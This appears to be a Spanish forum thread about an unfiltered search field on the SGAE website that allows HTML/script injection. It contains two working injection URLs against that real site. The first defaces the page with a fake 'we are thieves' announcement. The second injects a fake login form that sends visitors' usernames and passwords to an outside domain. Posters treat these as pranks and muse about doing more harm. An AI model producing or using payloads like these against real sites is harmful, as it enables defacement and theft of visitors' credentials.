fallo de seguridad?

No se, pero la respuesta muy normal no es no? xD

Sí, debería de filtrar cualquier tipo de etiqueta.

Lo peor es que ni siquiera le han puesto un límite al campo de búsqueda, por lo que se pueden hacer scripts enooormes que afecten al visitante.

#7 Realmente los tags JSP, como los PHP, contienen código que se ejecuta en el servidor. De este modo no se puede hacer el efecto que conseguimos con el JS (este último se ejecuta en el cliente)

Por otro lado, sería muy muy gracioso que en la portada de SGAE pusieran las "Últimas búsquedas". Así se ejecutarían los script para todo el mundo y se podrían hacer cosas divertidas, ais, qué lástima.

Mirad esto:
http://www.sgae.es/search/search-es.jsp?idioma=es&select=es&texto=%3Ch1+style%3Dmargin%3A-0.1em%3B%3E%3Cfont+color%3Dorange%3ESomos+unos+ladrones%3C%2Ffont%3E%3C%2Fh1%3E+%3Chr%2F%3E%3Cdiv+style%3Dfloat%3Aleft%3E%3Cimg+src%3Dhttp%3A%2F%2Ftecnoplaneta.files.wordpress.com%2F2009%2F04%2Fcd.jpg+width%3D100px+height%3D100px%3E%3C%2Fdiv%3E%3Cdiv+style%3Dmargin-left%3A120px%3B%3E+As%ED+es%2C+desde+hoy+mismo+reconocemos+que+el+famoso+canon+es+abusivo+y+vamos+a+dejar+de+robaros.+%3C%2Fdiv%3E+%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cfont+color%3Dgray+size%3D0.5em%3ENoticia+del+28+de+Diciembre+de+2008%3C%2Ffont%3E%3C%21--

Si, me aburria

La de maldades que se pueden hacer... priceless...

http://www.sgae.es/search/search-es.jsp?idioma=es&select=es&texto=%3Cdiv+style%3D%22padding%3A+25px%3B%22%3E%3Ch1%3EIntroduce+tu+usuario+y+contrase%F1a+para+continuar%3A%3C%2Fh1%3E%3Cform+action%3D%22http%3A%2F%2Fwww.webmaster-de-sgae-arreglame-por-favor.com%2F%22%3EUsuario%3A+%3Cinput+name%3D%22usuario%22+type%3D%22text%22%3E%3Cbr%3EContrase%F1a%3A+%3Cinput+name%3D%22pass%22+type%3D%22password%22%3E%3Cbr%3E%3Cinput+type%3D%22submit%22%3E%3C%2Fform%3E%3C%2Fdiv%3E